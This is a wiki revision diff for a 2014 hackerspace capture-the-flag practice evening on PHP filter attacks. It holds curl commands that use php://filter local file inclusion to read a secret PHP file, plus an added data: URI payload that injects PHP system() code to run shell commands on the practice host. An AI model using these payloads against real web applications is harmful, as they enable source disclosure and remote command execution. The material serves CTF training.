Difference between revisions of "CTF-practice-evening:2014-06-23"

From Technologia Incognita
Jump to: navigation, search
Line 29: Line 29:
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
 
** 'php://filter LFI curl -X GET 'http://coolfire.insomnia247.nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
 +
** http://coolfire.insomnia247.nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
 +
** (

Revision as of 18:37, 23 June 2014

CTF-practice-evening:2014-06-23
Date 2014/06/23
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 20

  • 23 June, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

PHP Filter attacks

  • Coolfire is providing the content for this evening!  :-)
  • PHP commands:
    • php://input
    • output
    • df
    • memory
    • temp
    • filter